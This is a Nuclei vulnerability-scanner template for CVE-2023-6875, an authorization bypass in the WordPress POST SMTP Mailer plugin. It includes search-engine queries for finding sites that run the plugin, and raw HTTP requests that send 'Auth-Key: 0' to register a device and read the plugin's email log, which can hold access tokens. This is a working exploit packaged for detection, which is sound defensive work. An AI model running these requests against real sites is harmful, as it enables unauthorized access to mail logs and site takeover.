nuclei-templates/http/cves/2023/CVE-2023-6875.yaml

69 lines
2.7 KiB
YAML
Raw Permalink Blame History

This file contains ambiguous Unicode characters!

This file contains ambiguous Unicode characters that may be confused with others in your current locale. If your use case is intentional and legitimate, you can safely ignore this warning. Use the Escape button to highlight these characters.

id: CVE-2023-6875
info:
name: WordPress POST SMTP Mailer <= 2.8.7 - Authorization Bypass
author: iamnoooob,rootxharsh,pdresearch
severity: critical
description: |
The POST SMTP Mailer Email log, Delivery Failure Notifications and Best Mail SMTP for WordPress plugin for WordPress is vulnerable to unauthorized access of data and modification of data due to a type juggling issue on the connect-app REST endpoint in all versions up to, and including, 2.8.7.
remediation: Fixed in 2.8.8
reference:
- https://plugins.trac.wordpress.org/browser/post-smtp/trunk/Postman/Mobile/includes/rest-api/v1/rest-api.php#L60
- https://plugins.trac.wordpress.org/changeset/3016051/post-smtp/trunk?contextall=1&old=3012318&old_path=%2Fpost-smtp%2Ftrunk
- https://www.wordfence.com/threat-intel/vulnerabilities/id/e675d64c-cbb8-4f24-9b6f-2597a97b49af?source=cve
- https://nvd.nist.gov/vuln/detail/CVE-2023-6875
- https://github.com/UlyssesSaicha/CVE-2023-6875
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2023-6875
cwe-id: CWE-862
epss-score: 0.05153
epss-percentile: 0.92961
cpe: cpe:2.3:a:wpexperts:post_smtp_mailer:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
max-request: 3
vendor: wpexperts
product: post_smtp_mailer
framework: wordpress
shodan-query: http.html:/wp-content/plugins/post-smtp
fofa-query: body=/wp-content/plugins/post-smtp
publicwww-query: "/wp-content/plugins/post-smtp"
tags: cve,cve2023,wp,wp-plugin,wordpress,smtp,mailer,auth-bypass,wpexperts
variables:
fcm_token: "{{randstr_1}}"
device: "{{randstr_2}}"
http:
- raw:
- |
POST /wp-json/post-smtp/v1/connect-app HTTP/1.1
Host: {{Hostname}}
Auth-Key: 0
Device: {{device}}
Fcm-Token: {{fcm_token}}
Content-Type: application/x-www-form-urlencoded
- |
POST /wp-json/post-smtp/v1/connect-app HTTP/1.1
Host: {{Hostname}}
Auth-Key: 0
Device: {{device}}
Fcm-Token: {{fcm_token}}
Content-Type: application/x-www-form-urlencoded
- |
GET /wp-json/post-smtp/v1/get-log HTTP/1.1
Host: {{Hostname}}
Auth-Key: 0
Device: {{device}}
Fcm-Token: {{fcm_token}}
matchers:
- type: dsl
dsl:
- 'contains_all(body_2, "success\":true,", "{\"fcm_token\":\"{{fcm_token}}")'
- 'contains_all(body_3, "true,\"data\":", "access_token=")'
condition: and
# digest: 4b0a0048304602210084ea25bc632778a481dd0545166e1484a4a3d1a752ada7e2a783adc2c7be5495022100dc5775f2bbc435230438bf01cbe56acfe2ed80489b51dfce16a6e14111069e20:922c64590222798bb761d5b6d8e72950